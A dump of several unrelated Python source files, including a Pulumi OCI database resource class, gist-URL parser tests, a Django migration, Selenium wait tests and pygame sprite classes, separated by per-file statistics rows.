return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateEndpointIp")
def private_endpoint_ip(self) -> pulumi.Output[str]:
"""
The private endpoint Ip address for the resource.
"""
return pulumi.get(self, "private_endpoint_ip")
@property
@pulumi.getter(name="privateEndpointLabel")
def private_endpoint_label(self) -> pulumi.Output[str]:
"""
(Updatable) The private endpoint label for the resource.
"""
return pulumi.get(self, "private_endpoint_label")
@property
@pulumi.getter(name="refreshableMode")
def refreshable_mode(self) -> pulumi.Output[str]:
"""
(Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_mode")
@property
@pulumi.getter(name="refreshableStatus")
def refreshable_status(self) -> pulumi.Output[str]:
"""
The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_status")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The Data Guard role of the Autonomous Container Database, if Autonomous Data Guard is enabled.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter(name="rotateKeyTrigger")
def rotate_key_trigger(self) -> pulumi.Output[Optional[bool]]:
"""
(Updatable) An optional property when flipped triggers rotation of KMS key. It is only applicable on dedicated databases i.e. where `is_dedicated` is true.
"""
return pulumi.get(self, "rotate_key_trigger")
@property
@pulumi.getter(name="serviceConsoleUrl")
def service_console_url(self) -> pulumi.Output[str]:
"""
The URL of the Service Console for the Autonomous Database.
"""
return pulumi.get(self, "service_console_url")
@property
@pulumi.getter
def source(self) -> pulumi.Output[str]:
"""
The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="sourceId")
def source_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "source_id")
@property
@pulumi.getter(name="standbyDb")
def standby_db(self) -> pulumi.Output['outputs.AutonomousDatabaseStandbyDb']:
"""
Autonomous Data Guard standby database details.
"""
return pulumi.get(self, "standby_db")
@property
@pulumi.getter(name="standbyWhitelistedIps")
def standby_whitelisted_ips(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "standby_whitelisted_ips")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
(Updatable) The current state of the Autonomous Database. Could be set to AVAILABLE or STOPPED
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="switchoverTo")
def switchover_to(self) -> pulumi.Output[Optional[str]]:
"""
It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
"""
return pulumi.get(self, "switchover_to")
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "system_tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time the Autonomous Database was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeDeletionOfFreeAutonomousDatabase")
def time_deletion_of_free_autonomous_database(self) -> pulumi.Output[str]:
"""
The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and without activity until this time, it will be deleted.
"""
return pulumi.get(self, "time_deletion_of_free_autonomous_database")
@property
@pulumi.getter(name="timeMaintenanceBegin")
def time_maintenance_begin(self) -> pulumi.Output[str]:
"""
The date and time when maintenance will begin.
"""
return pulumi.get(self, "time_maintenance_begin")
@property
@pulumi.getter(name="timeMaintenanceEnd")
def time_maintenance_end(self) -> pulumi.Output[str]:
"""
The date and time when maintenance will end.
"""
return pulumi.get(self, "time_maintenance_end")
@property
@pulumi.getter(name="timeOfLastFailover")
def time_of_last_failover(self) -> pulumi.Output[str]:
"""
The timestamp of the last failover operation.
"""
return pulumi.get(self, "time_of_last_failover")
@property
@pulumi.getter(name="timeOfLastRefresh")
def time_of_last_refresh(self) -> pulumi.Output[str]:
"""
The date and time when last refresh happened.
"""
return pulumi.get(self, "time_of_last_refresh")
@property
@pulumi.getter(name="timeOfLastRefreshPoint")
def time_of_last_refresh_point(self) -> pulumi.Output[str]:
"""
The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the refresh point is not included in the refresh.
"""
return pulumi.get(self, "time_of_last_refresh_point")
@property
@pulumi.getter(name="timeOfLastSwitchover")
def time_of_last_switchover(self) -> pulumi.Output[str]:
"""
The timestamp of the last switchover operation for the Autonomous Database.
"""
return pulumi.get(self, "time_of_last_switchover")
@property
@pulumi.getter(name="timeOfNextRefresh")
def time_of_next_refresh(self) -> pulumi.Output[str]:
"""
The date and time of next refresh.
"""
return pulumi.get(self, "time_of_next_refresh")
@property
@pulumi.getter(name="timeReclamationOfFreeAutonomousDatabase")
def time_reclamation_of_free_autonomous_database(self) -> pulumi.Output[str]:
"""
The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the database will automatically be put into the STOPPED state.
"""
return pulumi.get(self, "time_reclamation_of_free_autonomous_database")
@property
@pulumi.getter
def timestamp(self) -> pulumi.Output[str]:
"""
The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
"""
return pulumi.get(self, "timestamp")
@property
@pulumi.getter(name="usedDataStorageSizeInTbs")
def used_data_storage_size_in_tbs(self) -> pulumi.Output[int]:
"""
The amount of storage that has been used, in terabytes.
"""
return pulumi.get(self, "used_data_storage_size_in_tbs")
@property
@pulumi.getter(name="vaultId")
def vault_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
"""
return pulumi.get(self, "vault_id")
@property
@pulumi.getter(name="whitelistedIps")
def whitelisted_ips(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "whitelisted_ips")
| 68.223672 | 1,087 | 0.718151 | 27,616 | 214,427 | 5.374203 | 0.022197 | 0.062184 | 0.066955 | 0.045656 | 0.973958 | 0.961911 | 0.95299 | 0.942815 | 0.932709 | 0.912636 | 0 | 0.002301 | 0.18916 | 214,427 | 3,142 | 1,088 | 68.245385 | 0.851311 | 0.475878 | 0 | 0.791865 | 1 | 0 | 0.144943 | 0.074863 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171685 | false | 0.014263 | 0.003698 | 0 | 0.281564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
68d25674764a65b0060ae72b5bd4a4cc277f0d84 | 2,167 | py | Python | tests/test_utils.py | Cologler/glink-python | e76c673c07e1c19bb14c19f74902708cde37ffea | [
"MIT"
] | null | null | null | tests/test_utils.py | Cologler/glink-python | e76c673c07e1c19bb14c19f74902708cde37ffea | [
"MIT"
] | null | null | null | tests/test_utils.py | Cologler/glink-python | e76c673c07e1c19bb14c19f74902708cde37ffea | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (c) 2020~2999 - Cologler <skyoflw@gmail.com>
# ----------
#
# ----------
from glink.provs.gist import parse_gist_url, determine_gist_file
def test_parse_gist_url_fullurl():
assert parse_gist_url('https://gist.github.com/Cologler/17a6dfcb530d53d0b155706b8d657772#file-python-travis-yml') == dict(
user='Cologler',
gist_id='17a6dfcb530d53d0b155706b8d657772',
file='file-python-travis-yml'
)
def test_parse_gist_url_fullurl_without_file():
assert parse_gist_url('https://gist.github.com/Cologler/17a6dfcb530d53d0b155706b8d657772#') == dict(
user='Cologler',
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
assert parse_gist_url('https://gist.github.com/Cologler/17a6dfcb530d53d0b155706b8d657772') == dict(
user='Cologler',
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
def test_parse_gist_url_without_user():
assert parse_gist_url('https://gist.github.com/17a6dfcb530d53d0b155706b8d657772#file-python-travis-yml') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772',
file='file-python-travis-yml'
)
def test_parse_gist_url_without_user_and_file():
assert parse_gist_url('https://gist.github.com/17a6dfcb530d53d0b155706b8d657772#') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
assert parse_gist_url('https://gist.github.com/17a6dfcb530d53d0b155706b8d657772') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
def test_parse_gist_url_only_gist_id():
assert parse_gist_url('17a6dfcb530d53d0b155706b8d657772#file-python-travis-yml') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772',
file='file-python-travis-yml'
)
def test_parse_gist_url_only_gist_id_without_file():
assert parse_gist_url('17a6dfcb530d53d0b155706b8d657772#') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
assert parse_gist_url('17a6dfcb530d53d0b155706b8d657772') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
def test_guess_gist_file():
assert determine_gist_file('file-python-travis-yml', {'python.travis.yml'}) == 'python.travis.yml'
| 38.017544 | 126 | 0.733272 | 230 | 2,167 | 6.595652 | 0.16087 | 0.094924 | 0.126566 | 0.10679 | 0.908372 | 0.891233 | 0.804878 | 0.785761 | 0.747528 | 0.597231 | 0 | 0.217625 | 0.141209 | 2,167 | 56 | 127 | 38.696429 | 0.597528 | 0.045224 | 0 | 0.357143 | 0 | 0 | 0.467992 | 0.240543 | 0 | 0 | 0 | 0 | 0.238095 | 1 | 0.166667 | true | 0 | 0.02381 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
68f5625b1537fcda1de7367b1347d9f9d3ab9182 | 7,357 | py | Python | django_core_models/core/migrations/0001_initial.py | ajaniv/django-core-models | 7fde3792de745b5df875e8dc760096f5b10d46ce | [
"MIT"
] | null | null | null | django_core_models/core/migrations/0001_initial.py | ajaniv/django-core-models | 7fde3792de745b5df875e8dc760096f5b10d46ce | [
"MIT"
] | 15 | 2016-04-23T17:18:42.000Z | 2018-09-06T16:32:48.000Z | django_core_models/core/migrations/0001_initial.py | ajaniv/django-core-models | 7fde3792de745b5df875e8dc760096f5b10d46ce | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-05-14 00:19
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.CreateModel(
name='Annotation',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, unique=True)),
('uuid', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True)),
('version', models.IntegerField(default=0)),
('enabled', models.BooleanField(default=True)),
('deleted', models.BooleanField(default=False)),
('creation_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('alias', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('description', models.TextField(blank=True, null=True)),
('name', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('annotation', models.TextField()),
('creation_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_annotation_related_creation_user',
to=settings.AUTH_USER_MODEL)),
('effective_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_annotation_related_effective_user',
to=settings.AUTH_USER_MODEL)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_annotation_related_site', to='sites.Site')),
('update_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_annotation_related_update_user',
to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('name',),
'get_latest_by': 'update_time',
'verbose_name_plural': 'Annotations',
'verbose_name': 'Annotation',
'db_table': 'sl_core_annotation',
'abstract': False,
},
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, unique=True)),
('uuid', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True)),
('version', models.IntegerField(default=0)),
('enabled', models.BooleanField(default=True)),
('deleted', models.BooleanField(default=False)),
('creation_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('alias', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('description', models.TextField(blank=True, null=True)),
('name', models.CharField(db_index=True, max_length=255, unique=True)),
('creation_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_category_related_creation_user',
to=settings.AUTH_USER_MODEL)),
('effective_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_category_related_effective_user',
to=settings.AUTH_USER_MODEL)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_category_related_site', to='sites.Site')),
('update_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_category_related_update_user',
to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('name',),
'get_latest_by': 'update_time',
'verbose_name_plural': 'Categories',
'verbose_name': 'Category',
'db_table': 'sl_core_category',
'abstract': False,
},
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, unique=True)),
('uuid', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True)),
('version', models.IntegerField(default=0)),
('enabled', models.BooleanField(default=True)),
('deleted', models.BooleanField(default=False)),
('creation_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('alias', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('description', models.TextField(blank=True, null=True)),
('name', models.CharField(db_index=True, max_length=255, unique=True)),
('iso_code', models.CharField(max_length=3, unique=True)),
('creation_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_currency_related_creation_user',
to=settings.AUTH_USER_MODEL)),
('effective_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_currency_related_effective_user',
to=settings.AUTH_USER_MODEL)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_currency_related_site', to='sites.Site')),
('update_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_currency_related_update_user',
to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('name',),
'get_latest_by': 'update_time',
'verbose_name_plural': 'Currencies',
'verbose_name': 'Currency',
'db_table': 'sl_core_currency',
'abstract': False,
},
),
]
| 58.388889 | 107 | 0.534457 | 669 | 7,357 | 5.624813 | 0.156951 | 0.029763 | 0.048366 | 0.076003 | 0.842413 | 0.822216 | 0.822216 | 0.822216 | 0.822216 | 0.822216 | 0 | 0.009402 | 0.349463 | 7,357 | 125 | 108 | 58.856 | 0.776849 | 0.009107 | 0 | 0.632479 | 1 | 0 | 0.164128 | 0.057911 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.042735 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ec1878f380525f51b8cc01096f61432cd6ec3a2d | 83 | py | Python | server/app/bgtasks.py | michael0liver/fullstack-fastapi-vuejs-template | a686b7b71dca04f90538d00b350158cb6d7e9db2 | [
"MIT"
] | 15 | 2020-06-14T05:35:05.000Z | 2021-08-01T15:30:38.000Z | server/app/bgtasks.py | michael0liver/fullstack-fastapi-vuejs-template | a686b7b71dca04f90538d00b350158cb6d7e9db2 | [
"MIT"
] | 1 | 2022-02-27T19:32:18.000Z | 2022-02-27T19:32:18.000Z | server/app/bgtasks.py | michael0liver/fullstack-fastapi-vuejs-template | a686b7b71dca04f90538d00b350158cb6d7e9db2 | [
"MIT"
] | 1 | 2021-09-06T03:21:51.000Z | 2021-09-06T03:21:51.000Z | from fastapi.background import BackgroundTasks
def send_signup_email():
pass
| 13.833333 | 46 | 0.795181 | 10 | 83 | 6.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156627 | 83 | 5 | 47 | 16.6 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
ec5409e6857206881ecc18ab47891ceb7d8e6bcc | 4,493 | py | Python | tests/test_custom_wait_conditions.py | popescunsergiu/pytest-selenium-enhancer | 9966604d5c44621b2ac707fbec278bed7771594a | [
"MIT"
] | 2 | 2021-01-20T02:38:31.000Z | 2021-10-01T11:51:14.000Z | tests/test_custom_wait_conditions.py | popescunsergiu/pytest-selenium-enhancer | 9966604d5c44621b2ac707fbec278bed7771594a | [
"MIT"
] | null | null | null | tests/test_custom_wait_conditions.py | popescunsergiu/pytest-selenium-enhancer | 9966604d5c44621b2ac707fbec278bed7771594a | [
"MIT"
] | null | null | null | # pylint: disable=import-outside-toplevel
# pylint: disable=no-member
# pylint: disable=too-many-arguments
import time
import pytest
from pytest_selenium_enhancer import CustomWait
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
class TestCustomWaitConditions:
def test_wait_for_element_present(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
wait.wait_for_element_present(value='//h1[.="Examples"]', timeout=1)
try:
wait.wait_for_element_present(value='//h1[.="Examples dummy"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_element_visible(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
wait.wait_for_element_visible(value='//h1[.="Examples"]', timeout=1)
try:
wait.wait_for_element_visible(value='//h1[.="Examples dummy"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_element_clickable(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
wait.wait_for_element_clickable(value='//a[contains(@href,"https://github.com/twbs/bootstrap/archive/v4")]'
, timeout=1)
try:
wait.wait_for_element_clickable(value='//a[contains(@href,"https://github.com/twbs/bootstrap/archive/v4")]'
, timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_element_not_visible(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
wait.wait_for_element_not_visible(value='//h1[.="Examples dummy"]', timeout=1)
try:
wait.wait_for_element_visible(value='//h1[.="Examples"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_the_attribute_value(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
title = driver.find_element(By.XPATH, '//h1[.="Examples"]')
wait.wait_for_the_attribute_value(title, 'class', 'bd-title mt-0', timeout=1)
try:
wait.wait_for_the_attribute_value(title, 'class', 'bd-title', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_the_attribute_contain_value(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
title = driver.find_element(By.XPATH, '//h1[.="Examples"]')
wait.wait_for_the_attribute_contain_value(title, 'class', 'bd-title', timeout=1)
try:
wait.wait_for_the_attribute_contain_value(title, 'class', 'bs-title', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_child_element_visible(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
elem = driver.find_element(By.XPATH, '//main')
wait.wait_for_child_element_visible(elem, value='./h2[@id="custom-components"]', timeout=1)
try:
wait.wait_for_child_element_visible(elem, value='./h3[id="custom-components"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_child_element_not_visible(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
elem = driver.find_element(By.XPATH, '//main')
wait.wait_for_child_element_not_visible(elem, value='./h3[@id="custom-components"]', timeout=1)
try:
wait.wait_for_child_element_not_visible(elem, value='./h2[id="custom-components"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
| 37.756303 | 119 | 0.620076 | 574 | 4,493 | 4.641115 | 0.141115 | 0.063063 | 0.066066 | 0.042042 | 0.893018 | 0.884009 | 0.881381 | 0.867492 | 0.853979 | 0.79955 | 0 | 0.013934 | 0.249277 | 4,493 | 118 | 120 | 38.076271 | 0.775867 | 0.022257 | 0 | 0.717391 | 0 | 0.021739 | 0.151059 | 0.025974 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.054348 | 0 | 0.152174 | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ec5890573ee71d7f094c225dc0d4a5de5f01820a | 4,569 | py | Python | data/components/backgrounds.py | arnoldochavez/flappy-fish | 9814bb12fb91dcefae4d8801a2edd85c3fbe493c | [
"MIT"
] | null | null | null | data/components/backgrounds.py | arnoldochavez/flappy-fish | 9814bb12fb91dcefae4d8801a2edd85c3fbe493c | [
"MIT"
] | null | null | null | data/components/backgrounds.py | arnoldochavez/flappy-fish | 9814bb12fb91dcefae4d8801a2edd85c3fbe493c | [
"MIT"
] | null | null | null | __author__ = "arnoldochavez"
import pygame
from .. import constants as const
from .. import tools
from .. import resources as res
class SandMiddle:
_instances = []
def __init__( self, x, y ):
self.x = x
self.y = y
self.width = 256
self.height = 46
self.name = "Sand Middle"
self.offsetX = 0
self.offsetY = 46
self.destroy = False
self.angle = 0
self.depth = -1
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
self.control = None
self.image = res.IMAGE["SAND_MID"]
self.instanceID = len(type(self)._instances)
type(self)._instances.append(self)
def destroyed( self ):
type(self)._instances.pop(type(self)._instances.index(self))
def update( self ):
if self.control.gameState == const.GAMESTATE_RUN or self.control.gameState == const.GAMESTATE_START:
self.x -= 2
if self.x < -self.width:
self.x += len(type(self)._instances) * 256
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
def draw( self, surface ):
#tempSurf = pygame.Surface((self.image.get_width() * 4, self.image.get_height() * 4), pygame.SRCALPHA)
#tempSurf.blit(self.image, ((tempSurf.get_width()/2) - self.offsetX, (tempSurf.get_height()/2) - self.offsetY))
#tempSurf = pygame.transform.rotate(tempSurf, self.angle)
surface.blit(self.image, (self.x - self.offsetX, self.y - self.offsetY))
#DEBUG DRAW
if const.DEBUG_MODE:
pygame.draw.rect(surface, (255,0,0), self.rect, 1)
pygame.draw.line(surface, (0,0,255), (self.x-16, self.y), (self.x+16, self.y),1)
pygame.draw.line(surface, (0,0,255), (self.x, self.y-16), (self.x, self.y+16),1)
class SandBack:
_instances = []
def __init__( self, x, y ):
self.x = x
self.y = y
self.width = 256
self.height = 65
self.name = "Sand Back"
self.offsetX = 0
self.offsetY = 65
self.destroy = False
self.angle = 0
self.depth = -2
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
self.control = None
self.image = res.IMAGE["SAND_BACK"]
self.instanceID = len(type(self)._instances)
type(self)._instances.append(self)
def destroyed( self ):
type(self)._instances.pop(type(self)._instances.index(self))
def update( self ):
if self.control.gameState == const.GAMESTATE_RUN or self.control.gameState == const.GAMESTATE_START:
self.x -= 1
if self.x < -self.width:
self.x += len(type(self)._instances) * 256
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
def draw( self, surface ):
#tempSurf = pygame.Surface((self.image.get_width() * 4, self.image.get_height() * 4), pygame.SRCALPHA)
#tempSurf.blit(self.image, ((tempSurf.get_width()/2) - self.offsetX, (tempSurf.get_height()/2) - self.offsetY))
#tempSurf = pygame.transform.rotate(tempSurf, self.angle)
surface.blit(self.image, (self.x - self.offsetX, self.y - self.offsetY))
#DEBUG DRAW
if const.DEBUG_MODE:
pygame.draw.rect(surface, (255,0,0), self.rect, 1)
pygame.draw.line(surface, (0,0,255), (self.x-16, self.y), (self.x+16, self.y),1)
pygame.draw.line(surface, (0,0,255), (self.x, self.y-16), (self.x, self.y+16),1)
class SandFront:
_instances = []
def __init__( self, x, y ):
self.x = x
self.y = y
self.width = 256
self.height = 24
self.name = "Sand Back"
self.offsetX = 0
self.offsetY = 24
self.destroy = False
self.angle = 0
self.depth = 2
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
self.control = None
self.image = res.IMAGE["SAND_FRONT"]
self.instanceID = len(type(self)._instances)
type(self)._instances.append(self)
def destroyed( self ):
type(self)._instances.pop(type(self)._instances.index(self))
def update( self ):
if self.control.gameState == const.GAMESTATE_RUN or self.control.gameState == const.GAMESTATE_START:
self.x -= 2.5
if self.x < -self.width:
self.x += len(type(self)._instances) * 256
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
def draw( self, surface ):
#tempSurf = pygame.Surface((self.image.get_width() * 4, self.image.get_height() * 4), pygame.SRCALPHA)
#tempSurf.blit(self.image, ((tempSurf.get_width()/2) - self.offsetX, (tempSurf.get_height()/2) - self.offsetY))
#tempSurf = pygame.transform.rotate(tempSurf, self.angle)
surface.blit(self.image, (self.x - self.offsetX, self.y - self.offsetY))
#DEBUG DRAW
if const.DEBUG_MODE:
pygame.draw.rect(surface, (255,0,0), self.rect, 1)
pygame.draw.line(surface, (0,0,255), (self.x-16, self.y), (self.x+16, self.y),1)
pygame.draw.line(surface, (0,0,255), (self.x, self.y-16), (self.x, self.y+16),1)
| 34.097015 | 113 | 0.675859 | 717 | 4,569 | 4.225941 | 0.103208 | 0.059406 | 0.053465 | 0.039604 | 0.942904 | 0.935314 | 0.935314 | 0.935314 | 0.923762 | 0.89802 | 0 | 0.034358 | 0.152769 | 4,569 | 133 | 114 | 34.353383 | 0.748385 | 0.181878 | 0 | 0.762376 | 0 | 0 | 0.018519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.118812 | false | 0 | 0.039604 | 0 | 0.217822 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6b803dfb91cfaa5846c1411a359bf042fae556ee | 16,805 | py | Python | scripts/geometry_manipulation/stl_debug_output.py | maierbn/opendihu | 577650e2f6b36a7306766b0f4176f8124458cbf0 | [
"MIT"
] | 17 | 2018-11-25T19:29:34.000Z | 2021-09-20T04:46:22.000Z | scripts/geometry_manipulation/stl_debug_output.py | maierbn/opendihu | 577650e2f6b36a7306766b0f4176f8124458cbf0 | [
"MIT"
] | 1 | 2020-11-12T15:15:58.000Z | 2020-12-29T15:29:24.000Z | scripts/geometry_manipulation/stl_debug_output.py | maierbn/opendihu | 577650e2f6b36a7306766b0f4176f8124458cbf0 | [
"MIT"
] | 4 | 2018-10-17T12:18:10.000Z | 2021-05-28T13:24:20.000Z | #!/usr/bin/env ../../../../../dependencies/python/install/bin/python3
# -*- coding: utf-8 -*-
#
# The functions in this script will be called from the C++ code from parallel_fiber_estimation. They write some debugging information to files.
import sys, os
import numpy as np
import stl
from stl import mesh
import vtk
import stl_create_rings
